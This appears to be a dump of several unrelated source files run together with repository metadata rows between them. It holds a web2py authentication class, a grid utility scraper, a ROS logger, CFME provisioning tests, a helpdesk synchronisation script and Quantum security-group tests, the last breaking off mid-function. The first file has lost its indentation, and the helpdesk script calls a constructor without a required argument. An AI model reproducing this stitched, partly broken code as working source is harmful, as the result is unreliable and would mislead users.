""" Do NOT define tables """
pass
def register(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT):
"""
Register a new user
"""
request = current.request
response = current.response
session = current.session
if self.is_logged_in():
# don't allow registration if we're already logged in
redirect(self.settings.logged_url)
# fill in defaults
if next == DEFAULT:
next = request.get_vars._next \
or request.post_vars._next \
or self.settings.register_next
if onvalidation == DEFAULT:
onvalidation = self.settings.register_onvalidation
if onaccept == DEFAULT:
onaccept = self.settings.register_onaccept
if log == DEFAULT:
log = self.messages.register_log
# create a form...
userfield = self.settings.login_userfield
passfield = self.settings.password_field
formstyle = self.settings.formstyle
form =FORM( \
TABLE( \
TR(TD('Username:'), TD(INPUT(_name="username",_type="text",requires=IS_SLUG(error_message="Invalid username")))), \
TR(TD('Email:'), TD(INPUT(_name="email", _type="text",requires=IS_EMAIL(error_message=self.messages.invalid_email)))), \
TR(TD('Password:'), TD(INPUT(_name="password", _type="password"))), \
                  TR(TD('Re-type Password:'), TD(INPUT(_name="password2", _type="password", \
                           requires=IS_EXPR("value==%s" % repr(request.vars.get('password',None)), \
                                            error_message=self.messages.mismatched_password)))) \
), \
INPUT(_type="Submit",_value="Register"), \
_name="register"
)
if form.accepts(request, session, formname='register', onvalidation=onvalidation,hideerror=self.settings.hideerror):
# verify that the password forms are the same
if form.vars['password'] != form.vars['password2']:
            response.flash = self.messages.mismatched_password
            return form
# inform the admin
"""
if not self.settings.mailer or \
not self.settings.mailer.send(
to=self.maint_email,
subject=self.messages.verify_email_subject,
message=self.messages.verify_email % dict(username=form.vars['username'], email=form.vars['email'])):
response.flash = self.messages.unable_send_email
return form
session.flash = self.messages.email_sent
"""
# make sure this user does not exist
rc = 0
msg = ""
try:
user = Users(self.api, {'username': form.vars['username']})[0]
rc = -1 # already exists
msg = "User already exists"
except:
pass
# create the user
if rc == 0:
try:
user_fields = {'username': form.vars['username'], 'password': form.vars['password'], 'email': form.vars['email']}
rc = self.api.call( ("127.0.0.1", "localhost"), "AddUser", self.api.maint_auth, user_fields )
except Exception, e:
logger.exception(e, "register: exception")
logger.flush()
msg = "User could not be registered"
rc = -1
if rc < 0:
response.flash = msg
logger.error("Failed to add user '%s' (email '%s')" % (user_fields['username'], user_fields['email']) )
return form
session.flash = self.messages.registration_pending
if log:
logger.info("Added user '%s' (email '%s')" % (user_fields['username'], user_fields['email']) )
callback(onaccept,form)
if not next:
next = self.url(args = request.args)
elif isinstance(next, (list, tuple)): ### fix issue with 2.6
next = next[0]
elif next and not next[0] == '/' and next[:4] != 'http':
next = self.url(next.replace('[id]', str(form.vars.id)))
redirect(next)
return form
def login_bare( self, username, password ):
"""
Bare essentials login.
"""
      request = current.request
      session = current.session
      api = MDAPI()
user = None
try:
user = auth_user_from_email( api, username )
except Exception, e:
logger.error( "User '%s' could not be authenticated (exception = %s)" % (username, e) )
return False
rc = False
auth_struct = {'AuthMethod': 'password', 'Username': user['username'], 'AuthString': password}
try:
rc = auth_password_check( api, auth_struct, user, None )
except Exception, e:
logger.error( "User '%s' failed to authenticate" % username)
if rc and user:
user_public = user.public()
user_stored = Storage(user_public)
         logger.info("SMDS_Auth: User '%s' logged in" % user_public['username'])
# process authenticated users
# user wants to be logged in for longer
session.auth = Storage(
user = user_stored,
last_visit = request.now,
expiration = self.settings.expiration,
hmac_key = web2py_uuid()
)
self.user = user_public
logger.info("SMDS_Auth: user_id = %s" % self.user_id)
logger.flush()
return user
return rc
def login(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT):
"""
Handle a login request, and redirect.
"""
request = current.request
response = current.response
session = current.session
username_field = self.settings.login_userfield
password_field = self.settings.password_field
if next == DEFAULT:
next = request.get_vars._next \
or request.post_vars._next \
or self.settings.login_next
if onvalidation == DEFAULT:
onvalidation = self.settings.login_onvalidation
if onaccept == DEFAULT:
onaccept = self.settings.login_onaccept
if log == DEFAULT:
log = self.messages.login_log
user = None
accepted_form = False
if self.settings.login_form == self:
# this object was responsible for logging in
form =FORM( \
TABLE( \
TR(TD('Username:'), TD(INPUT(_name="username",_type="text",requires=IS_SLUG(error_message="Invalid Username")))), \
TR(TD('Password:'), TD(INPUT(_name="password", _type="password"))) \
), \
INPUT(_type="Submit",_value="Login"), \
_name="login"
)
if form.accepts(request.vars, session,
formname='login',
onvalidation=onvalidation,
hideerror=self.settings.hideerror):
# sanitize inputs
accepted_form = True
# check for username in db
username = form.vars[username_field]
user = None
try:
user = Users( self.api, {'username': username} )[0]
except:
pass
if user:
# user in db, check if registration pending or disabled
temp_user = user
if temp_user['enabled'] == False:
# user is not yet enabled
response.flash = self.messages.login_disabled
return form
# check password
try:
rc = auth_password_check( self.api, {'Username':user['username'], 'AuthMethod':'password', 'AuthString':form.vars[password_field]}, user, None )
except:
if log:
logger.error("SMDS_Auth: User '%s' authentication failed (invalid credentials)" % user['username'] )
logger.flush()
user = None # invalid credentials
if not user:
if log:
logger.error("SMDS_Auth: User could not be looked up" )
logger.flush()
# invalid login
session.flash = self.messages.invalid_login
redirect(self.url(args=request.args,vars=request.get_vars))
if user:
user_public = user.public()
user_stored = Storage(user_public)
if log:
logger.info("SMDS_Auth: User '%s' logged in" % user_public['username'])
# process authenticated users
# user wants to be logged in for longer
session.auth = Storage(
user = user_stored,
last_visit = request.now,
expiration = self.settings.long_expiration,
remember = request.vars.has_key("remember"),
hmac_key = web2py_uuid()
)
self.user = user_public
logger.info("SMDS_Auth: user_id = %s" % self.user_id)
logger.flush()
session.flash = self.messages.logged_in
# how to continue
if self.settings.login_form == self:
if accepted_form:
callback(onaccept,form)
if isinstance(next, (list, tuple)):
# fix issue with 2.6
next = next[0]
if next and not next[0] == '/' and next[:4] != 'http':
next = self.url(next.replace('[id]', str(form.vars.id)))
redirect(next)
return form
elif user:
callback(onaccept,None)
redirect(next)
def logout(self, next=DEFAULT, onlogout=DEFAULT, log=DEFAULT):
"""
Handle a logout
"""
session = current.session
user = None
if session.auth:
user = session.auth['user']
self.user = user
if log:
if user:
logger.info("SMDS_Auth: User '%s' logged out" % user['username'])
logger.flush()
next = self.settings.logout_next
#super(SMDS_Auth, self).logout( lambda x: redirect(self.url('index')), lambda x, log )
if next == DEFAULT:
next = self.settings.logout_next
"""
if onlogout == DEFAULT:
onlogout = self.settings.logout_onlogout
if onlogout:
onlogout(self.user)
if log == DEFAULT:
log = self.messages.logout_log
if log and self.user:
self.log_event(log % self.user)
if self.settings.login_form != self:
cas = self.settings.login_form
cas_user = cas.get_user()
if cas_user:
next = cas.logout_url(next)
"""
current.session.auth = None
current.session.flash = self.messages.logged_out
if next:
redirect(next)
def requires_login(self):
"""
decorator that prevents access to action if not logged in
"""
def decorator(action):
def f(*a, **b):
if self.settings.allow_basic_login_only and not self.basic():
if current.request.is_restful:
raise HTTP(403,"Not authorized")
return call_or_redirect(self.settings.on_failed_authorization)
if not self.basic() and not current.session.auth: #self.is_logged_in():
if current.request.is_restful:
raise HTTP(403,"Not authorized")
request = current.request
next = URL(r=request,args=request.args,
vars=request.get_vars)
current.session.flash = current.response.flash
return call_or_redirect(
self.settings.on_failed_authentication,
self.settings.login_url + '?_next='+urllib.quote(next)
)
return action(*a, **b)
f.__doc__ = action.__doc__
f.__name__ = action.__name__
f.__dict__.update(action.__dict__)
return f
return decorator
def profile(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT):
pass
def change_password(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT):
pass
def verify_email(self, next=DEFAULT, onaccept=DEFAULT, log=DEFAULT ):
pass
def retrieve_username(self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT ):
pass
def request_reset_password( self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT ):
pass
def reset_password( self, next=DEFAULT, onvalidation=DEFAULT, onaccept=DEFAULT, log=DEFAULT ):
pass
def impersonate( self, user_id=DEFAULT ):
pass
def groups( self ):
pass
def not_authorized( self ):
""" YOU SHALL NOT PASS """
return 'ACCESS DENIED'
def SMDS_authentication( logfile="/tmp/SMDS_login.log" ):
"""
Authenticate with the Syndicate metadata service
"""
logger.init( open(logfile, "a") )
def SMDS_auth_aux(username, password):
api = MDAPI()
user = None
try:
user = auth_user_from_email( api, username )
except Exception, e:
logger.error( "User '%s' could not be authenticated (exception = %s)" % (username, e) )
return False
rc = False
auth_struct = {'AuthMethod': 'password', 'Username': user['username'], 'AuthString': password}
try:
rc = auth_password_check( api, auth_struct, user, None )
except Exception, e:
logger.error( "User '%s' failed to authenticate" % username)
return rc
return SMDS_auth_aux
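# Hedged usage sketch (added for illustration): the factory returns a
# (username, password) -> bool callable suitable for web2py's alternate
# login hooks, e.g.
#   auth.settings.login_methods.append(
#       SMDS_authentication(logfile="/tmp/SMDS_login.log"))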
| apache-2.0 | 1,897,465,155,611,255,800 | 35.087952 | 164 | 0.567723 | false | 4.274115 | false | false | false |
is0280fp/Side-by-Side-Walking-Model | scraper.py | 1 | 4280 | from collections import defaultdict
import numpy as np
class UtilityScraper(object):
def __init__(self, num_grid_x, num_grid_y):
self.num_grid_x = num_grid_x
self.num_grid_y = num_grid_y
self.utilities = defaultdict(list)
self.factors = defaultdict(list)
self.ra_values = defaultdict(list)
def add(self, f_ma_me, f_ma_you, f_mv_me, f_mv_you,
f_mw_me, f_mw_you, f_ra, f_rd, f_rv,
f_o_me, f_o_you, f_s_me, f_s_you,
o_me_dis, o_you_dis, s_me_theta, s_you_theta, rv_vec,
rd_dis, ra_theta, mv_me_vec, mv_you_vec, ma_me_gal,
ma_you_gal, mw_me_rad, mw_you_rad):
self.utilities["f_rv"].append(f_rv)
self.utilities["f_rd"].append(f_rd)
self.utilities["f_ra"].append(f_ra)
self.utilities["f_mv_me"].append(f_mv_me)
self.utilities["f_mv_you"].append(f_mv_you)
self.utilities["f_ma_me"].append(f_ma_me)
self.utilities["f_ma_you"].append(f_ma_you)
self.utilities["f_mw_me"].append(f_mw_me)
self.utilities["f_mw_you"].append(f_mw_you)
self.utilities["f_o_me"].append(f_o_me)
self.utilities["f_o_you"].append(f_o_you)
self.utilities["f_s_me"].append(f_s_me)
self.utilities["f_s_you"].append(f_s_you)
self.factors["rv_vec"].append(rv_vec)
self.factors["rd_dis"].append(rd_dis)
self.factors["ra_theta"].append(ra_theta)
self.factors["mv_me_vec"].append(mv_me_vec)
self.factors["mv_you_vec"].append(mv_you_vec)
self.factors["ma_me_gal"].append(ma_me_gal)
self.factors["ma_you_gal"].append(ma_you_gal)
self.factors["mw_me_rad"].append(mw_me_rad)
self.factors["mw_you_rad"].append(mw_you_rad)
self.factors["o_me_dis"].append(o_me_dis)
self.factors["o_you_dis"].append(o_you_dis)
self.factors["s_me_theta"].append(s_me_theta)
self.factors["s_you_theta"].append(s_you_theta)
def add_ra_values(self, p_me, p_you, d_you, v_yoko,
theta_mae, theta_yoko, theta, r_a):
self.ra_values["p_me"].append(p_me)
self.ra_values["p_you"].append(p_you)
self.ra_values["v_mae"].append(d_you)
self.ra_values["v_yoko"].append(v_yoko)
self.ra_values["theta_mae"].append(theta_mae)
self.ra_values["theta_yoko"].append(theta_yoko)
self.ra_values["theta"].append(theta)
self.ra_values["r_a"].append(r_a)
def get_utility_maps(self):
maps = {}
for name, lst in self.utilities.items():
assert not np.any(np.isnan(lst)), "{}, {}".format(name, lst)
lst = np.array(lst)
num_step = len(lst) // (self.num_grid_y * self.num_grid_x *
self.num_grid_y * self.num_grid_x)
maps[name] = lst.reshape(
num_step, self.num_grid_y, self.num_grid_x,
self.num_grid_y, self.num_grid_x)
return maps
def get_factors_maps(self):
theta_maps = {}
for name, lst in self.factors.items():
assert not np.any(np.isnan(lst)), "{}, {}".format(name, lst)
lst = np.array(lst)
num_step = len(lst) // (self.num_grid_y * self.num_grid_x *
self.num_grid_y * self.num_grid_x)
theta_maps[name] = lst.reshape(
num_step, self.num_grid_y, self.num_grid_x,
self.num_grid_y, self.num_grid_x)
return theta_maps
def get_values_maps(self):
values_maps = {}
for name, lst in self.ra_values.items():
assert not np.any(np.isnan(lst)), "{}, {}".format(name, lst)
lst = np.array(lst)
num_step = len(lst) // (self.num_grid_y * self.num_grid_x *
self.num_grid_y * self.num_grid_x)
size = lst.shape[-1]
if lst.ndim > 1:
values_maps[name] = lst.reshape(
num_step, self.num_grid_y, self.num_grid_x,
self.num_grid_y, self.num_grid_x, size)
else:
values_maps[name] = lst.reshape(
num_step, self.num_grid_y, self.num_grid_x,
self.num_grid_y, self.num_grid_x, 1)
return values_maps
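# Illustrative usage (assumed grid sizes and call pattern; add() must be called
# once per (me-cell, you-cell) pair per step so the reshapes above divide
# evenly):
#
#   scraper = UtilityScraper(num_grid_x=5, num_grid_y=5)
#   # ... repeated scraper.add(...) / scraper.add_ra_values(...) calls ...
#   maps = scraper.get_utility_maps()
#   # maps["f_rv"].shape == (num_step, 5, 5, 5, 5)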
| mit | -4,301,349,524,016,367,000 | 42.673469 | 72 | 0.542757 | false | 2.943604 | false | false | false |
team-vigir/flexbe_behavior_engine | flexbe_core/src/flexbe_core/logger.py | 1 | 2138 | #!/usr/bin/env python
import rospy
from flexbe_msgs.msg import BehaviorLog
class Logger(object):
'''
Realizes behavior-specific logging.
'''
REPORT_INFO = BehaviorLog.INFO
REPORT_WARN = BehaviorLog.WARN
REPORT_HINT = BehaviorLog.HINT
REPORT_ERROR = BehaviorLog.ERROR
REPORT_DEBUG = BehaviorLog.DEBUG
LOGGING_TOPIC = 'flexbe/log'
_pub = None
@staticmethod
def initialize():
Logger._pub = rospy.Publisher(Logger.LOGGING_TOPIC, BehaviorLog, queue_size=100)
@staticmethod
def log(text, severity):
if Logger._pub is None:
Logger.initialize()
# send message with logged text
msg = BehaviorLog()
msg.text = str(text)
msg.status_code = severity
Logger._pub.publish(msg)
# also log locally
Logger.local(text, severity)
@staticmethod
def local(text, severity):
if severity == Logger.REPORT_INFO:
rospy.loginfo(text)
elif severity == Logger.REPORT_WARN:
rospy.logwarn(text)
elif severity == Logger.REPORT_HINT:
rospy.loginfo('\033[94mBehavior Hint: %s\033[0m', text)
elif severity == Logger.REPORT_ERROR:
rospy.logerr(text)
elif severity == Logger.REPORT_DEBUG:
rospy.logdebug(text)
else:
rospy.logdebug(text + ' (unknown log level %s)' % str(severity))
@staticmethod
def logdebug(text, *args):
Logger.log(text % args, Logger.REPORT_DEBUG)
@staticmethod
def loginfo(text, *args):
Logger.log(text % args, Logger.REPORT_INFO)
@staticmethod
def logwarn(text, *args):
Logger.log(text % args, Logger.REPORT_WARN)
@staticmethod
def loghint(text, *args):
Logger.log(text % args, Logger.REPORT_HINT)
@staticmethod
def logerr(text, *args):
Logger.log(text % args, Logger.REPORT_ERROR)
@staticmethod
def localdebug(text, *args):
Logger.local(text % args, Logger.REPORT_DEBUG)
@staticmethod
def localinfo(text, *args):
Logger.local(text % args, Logger.REPORT_INFO)
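    # Illustrative usage (assumed to run inside an initialized ROS node, since
    # both the publisher and the rospy log calls require one):
    #
    #   Logger.loginfo("behavior %s started", "patrol")
    #   Logger.logwarn("battery at %d%%", 15)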
| bsd-3-clause | -6,835,429,230,349,826,000 | 26.410256 | 88 | 0.61927 | false | 3.831541 | false | false | false |
jkandasa/integration_tests | cfme/tests/services/test_operations.py | 1 | 4462 | # -*- coding: utf-8 -*-
"""Tests checking for link access from outside."""
import fauxfactory
import pytest
from widgetastic.utils import partial_match
from cfme import test_requirements
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.virtual_machines import Vm
from cfme.fixtures import pytest_selenium as sel
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.browser import browser
from cfme.utils.wait import wait_for
from fixtures.provider import setup_one_by_class_or_skip
from fixtures.pytest_store import store
pytestmark = [
pytest.mark.meta(server_roles="-automate"), # To prevent the provisioning itself.
test_requirements.service
]
@pytest.fixture(scope='module')
def a_provider(request):
return setup_one_by_class_or_skip(request, InfraProvider)
@pytest.fixture(scope="module")
def provider_data(a_provider):
return a_provider.get_yaml_data()
@pytest.fixture(scope="module")
def provisioning(provider_data):
return provider_data.get("provisioning", {})
@pytest.fixture(scope="module")
def template_name(provisioning):
return provisioning.get("template")
@pytest.fixture(scope="module")
def vm_name():
return fauxfactory.gen_alphanumeric(length=16)
@pytest.yield_fixture(scope="module")
def generated_request(appliance,
a_provider, provider_data, provisioning, template_name, vm_name):
"""Creates a provision request, that is not automatically approved, and returns the search data.
    After finishing the test, the request should be automatically deleted.
    Slightly modified code from :py:mod:`cfme.tests.infrastructure.test_provisioning`
"""
first_name = fauxfactory.gen_alphanumeric()
last_name = fauxfactory.gen_alphanumeric()
notes = fauxfactory.gen_alphanumeric()
e_mail = "{}@{}.test".format(first_name, last_name)
host, datastore = map(provisioning.get, ('host', 'datastore'))
vm = Vm(name=vm_name, provider=a_provider, template_name=template_name)
view = navigate_to(vm, 'Provision')
provisioning_data = {
'request': {
'email': e_mail,
'first_name': first_name,
'last_name': last_name,
'notes': notes},
'catalog': {
'vm_name': vm_name,
'num_vms': '10'},
'environment':
{'host_name': {'name': host},
'datastore_name': {'name': datastore}},
}
# Same thing, different names. :\
if provider_data["type"] == 'rhevm':
provisioning_data['catalog']['provision_type'] = 'Native Clone'
elif provider_data["type"] == 'virtualcenter':
provisioning_data['catalog']['provision_type'] = 'VMware'
try:
provisioning_data['network'] = {'vlan': partial_match(provisioning['vlan'])}
except KeyError:
# provisioning['vlan'] is required for rhevm provisioning
if provider_data["type"] == 'rhevm':
raise pytest.fail('rhevm requires a vlan value in provisioning info')
view.form.fill_with(provisioning_data, on_change=view.form.submit_button)
request_cells = {
"Description": "Provision from [{}] to [{}###]".format(template_name, vm_name),
}
provision_request = appliance.collections.requests.instantiate(cells=request_cells)
yield provision_request
browser().get(store.base_url)
appliance.server.login_admin()
provision_request.remove_request()
@pytest.mark.tier(3)
def test_services_request_direct_url(generated_request):
"""Go to the request page, save the url and try to access it directly."""
assert navigate_to(generated_request, 'Details'), "could not find the request!"
request_url = sel.current_url()
sel.get(sel.base_url()) # I need to flip it with something different here
sel.get(request_url) # Ok, direct access now.
wait_for(
lambda: sel.is_displayed("//body[contains(@onload, 'miqOnLoad')]"),
num_sec=20,
message="wait for a CFME page appear",
delay=0.5
)
@pytest.mark.tier(3)
def test_copy_request(request, generated_request, vm_name, template_name):
"""Check if request gets properly copied."""
modifications = {'catalog': {'vm_name': fauxfactory.gen_alphanumeric(length=16)}}
new_request = generated_request.copy_request(values=modifications)
request.addfinalizer(new_request.remove_request)
assert navigate_to(new_request, 'Details')
| gpl-2.0 | 5,842,273,452,863,127,000 | 33.589147 | 100 | 0.680636 | false | 3.774958 | true | false | false |
flopezag/fiware-management-scripts | HelpDesk/synchronization.py | 1 | 4487 | #!/usr/bin/env <PATH_HELPDESK>/env/bin/python
# -*- coding: utf-8 -*-
##
# Copyright 2017 FIWARE Foundation, e.V.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
##
from HelpDesk.desks.helpdeskImporter import HelpDeskImporter
from HelpDesk.desks.helpdesk import HelpDesk
from HelpDesk.platforms.servers import AskBot
from logging import error, exception, info, debug
from logging import _nameToLevel as nameToLevel
from argparse import ArgumentParser
from sys import exc_info
from Common.logging_conf import LoggingConf
from Config.settings import JIRA_URL
__author__ = 'Fernando López'
class AskbotSync(LoggingConf):
def __init__(self, loglevel):
super(AskbotSync, self).__init__(loglevel=loglevel, log_file='askbot.log')
info('\n\n---- Askbot Synchronization----\n')
try:
self.helpdesk = HelpDeskImporter()
self.helpdesk.get_monitors()
except Exception as e:
error(e)
error('No connection to JIRA https://{}'.format(JIRA_URL))
error("Unexpected error: {}".format(exc_info()[0]))
exit()
self.askbot = AskBot()
def process(self):
def get_status(q):
if q.monitor:
result = q.monitor.fields.status
else:
result = 'None'
return result
try:
self.askbot.get_questions()
except Exception as e:
error(e)
error('Failed to get questions from server')
finally:
self.askbot.match(self.helpdesk.monitors)
for question in self.askbot.questions:
debug('{}, monitor={}, monitor status={}, question url={}'
.format(question, question.monitor, get_status(q=question), question.url))
self.helpdesk.update_with(self.askbot.questions)
info('helpdesk: # issues created = {}'.format(self.helpdesk.n_monitors))
info('helpdesk: # issues transitions = {}'.format(self.helpdesk.n_transitions))
info('askbot questions = {}'.format(len(self.askbot.questions)))
self.close()
class HelpDeskCaretaker(LoggingConf):
def __init__(self, loglevel, mailer):
super(HelpDeskCaretaker, self).__init__(loglevel=loglevel, log_file='mainhelpdesk.log')
info('\n\n---- HELP-DESK Caretakers----\n')
try:
self.helpdesk = HelpDesk(loglevel=loglevel, mailer=mailer)
except Exception as e:
error(e)
exception("Unexpected error: {}".format(exc_info()[0]))
exit()
def process(self):
self.helpdesk.channel_requests()
self.helpdesk.assign_requests()
self.helpdesk.remove_spam()
self.helpdesk.naming()
info('main helpdesk: # issues assigned = {}'.format(self.helpdesk.n_assignments))
info('main helpdesk: # issues channeled = {}'.format(self.helpdesk.n_channeled))
info('main helpdesk: # issues deleted = {}'.format(self.helpdesk.n_removed))
info('main helpdesk: # issues renamed = {}'.format(self.helpdesk.n_renamed))
self.close()
if __name__ == "__main__":
parser = ArgumentParser(prog='Askbot', description='Synchronising scripts')
parser.add_argument('-l', '--log',
default='INFO',
help='The logging level to be used.')
args = parser.parse_args()
loglevel = None
try:
loglevel = nameToLevel[args.log.upper()]
except Exception as e1:
print('Invalid log level: {}'.format(args.log))
print('Please use one of the following values:')
print(' * CRITICAL')
print(' * ERROR')
print(' * WARNING')
print(' * INFO')
print(' * DEBUG')
print(' * NOTSET')
exit()
askbotSync = AskbotSync(loglevel=loglevel)
askbotSync.process()
helpdeskCaretaker = HelpDeskCaretaker(loglevel=loglevel)
helpdeskCaretaker.process()
| apache-2.0 | -5,162,619,168,462,307,000 | 32.984848 | 95 | 0.625279 | false | 3.935088 | false | false | false |
rossella/neutron | quantum/tests/unit/test_security_groups_rpc.py | 1 | 52820 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from contextlib import nested
import mock
from mock import call
import unittest2 as unittest
import mox
from quantum.agent import firewall as firewall_base
from quantum.agent.linux import iptables_manager
from quantum.agent import rpc as agent_rpc
from quantum.agent import securitygroups_rpc as sg_rpc
from quantum import context
from quantum.db import securitygroups_rpc_base as sg_db_rpc
from quantum.extensions import securitygroup as ext_sg
from quantum.openstack.common import cfg
from quantum.openstack.common.rpc import proxy
from quantum.tests.unit import test_extension_security_group as test_sg
from quantum.tests.unit import test_iptables_firewall as test_fw
class FakeSGCallback(sg_db_rpc.SecurityGroupServerRpcCallbackMixin):
def get_port_from_device(self, device):
device = self.devices.get(device)
if device:
device['security_group_rules'] = []
device['security_group_source_groups'] = []
device['fixed_ips'] = [ip['ip_address']
for ip in device['fixed_ips']]
return device
class SGServerRpcCallBackMixinTestCase(test_sg.SecurityGroupDBTestCase):
def setUp(self):
super(SGServerRpcCallBackMixinTestCase, self).setUp()
self.rpc = FakeSGCallback()
def test_security_group_rules_for_devices_ipv4_ingress(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv4']
with self.network() as n:
with nested(self.subnet(n),
self.security_group()) as (subnet_v4,
sg1):
sg1_id = sg1['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '22',
'22')
rule2 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '23',
'23', fake_prefix)
rules = {
'security_group_rules': [rule1['security_group_rule'],
rule2['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
security_groups=[sg1_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'ingress',
'protocol': 'tcp', 'ethertype': 'IPv4',
'port_range_max': 22,
'security_group_id': sg1_id,
'port_range_min': 22},
{'direction': 'ingress', 'protocol': 'tcp',
'ethertype': 'IPv4',
'port_range_max': 23, 'security_group_id': sg1_id,
'port_range_min': 23,
'source_ip_prefix': fake_prefix},
{'ethertype': 'IPv4', 'direction': 'egress'},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
def test_security_group_rules_for_devices_ipv4_egress(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv4']
with self.network() as n:
with nested(self.subnet(n),
self.security_group()) as (subnet_v4,
sg1):
sg1_id = sg1['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'egress', 'tcp', '22',
'22')
rule2 = self._build_security_group_rule(
sg1_id,
'egress', 'udp', '23',
'23', fake_prefix)
rules = {
'security_group_rules': [rule1['security_group_rule'],
rule2['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
security_groups=[sg1_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'egress',
'protocol': 'tcp', 'ethertype': 'IPv4',
'port_range_max': 22,
'security_group_id': sg1_id,
'port_range_min': 22},
{'direction': 'egress', 'protocol': 'udp',
'ethertype': 'IPv4',
'port_range_max': 23, 'security_group_id': sg1_id,
'port_range_min': 23,
'dest_ip_prefix': fake_prefix},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
def test_security_group_rules_for_devices_ipv4_source_group(self):
with self.network() as n:
with nested(self.subnet(n),
self.security_group(),
self.security_group()) as (subnet_v4,
sg1,
sg2):
sg1_id = sg1['security_group']['id']
sg2_id = sg2['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '24',
'25', source_group_id=sg2['security_group']['id'])
rules = {
'security_group_rules': [rule1['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
security_groups=[sg1_id,
sg2_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
res2 = self._create_port(
self.fmt, n['network']['id'],
security_groups=[sg2_id])
ports_rest2 = self.deserialize(self.fmt, res2)
port_id2 = ports_rest2['port']['id']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': u'ingress',
'source_ip_prefix': u'10.0.0.3/32',
'protocol': u'tcp', 'ethertype': u'IPv4',
'port_range_max': 25, 'port_range_min': 24,
'source_group_id': sg2_id,
'security_group_id': sg1_id},
{'ethertype': 'IPv4', 'direction': 'egress'},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
self._delete('ports', port_id2)
def test_security_group_rules_for_devices_ipv6_ingress(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv6']
with self.network() as n:
with nested(self.subnet(n,
cidr=fake_prefix,
ip_version=6),
self.security_group()) as (subnet_v6,
sg1):
sg1_id = sg1['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '22',
'22',
ethertype='IPv6')
rule2 = self._build_security_group_rule(
sg1_id,
'ingress', 'udp', '23',
'23', fake_prefix,
ethertype='IPv6')
rules = {
'security_group_rules': [rule1['security_group_rule'],
rule2['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
fixed_ips=[{'subnet_id': subnet_v6['subnet']['id']}],
security_groups=[sg1_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'ingress',
'protocol': 'tcp', 'ethertype': 'IPv6',
'port_range_max': 22,
'security_group_id': sg1_id,
'port_range_min': 22},
{'direction': 'ingress', 'protocol': 'udp',
'ethertype': 'IPv6',
'port_range_max': 23, 'security_group_id': sg1_id,
'port_range_min': 23,
'source_ip_prefix': fake_prefix},
{'ethertype': 'IPv6', 'direction': 'egress'},
]
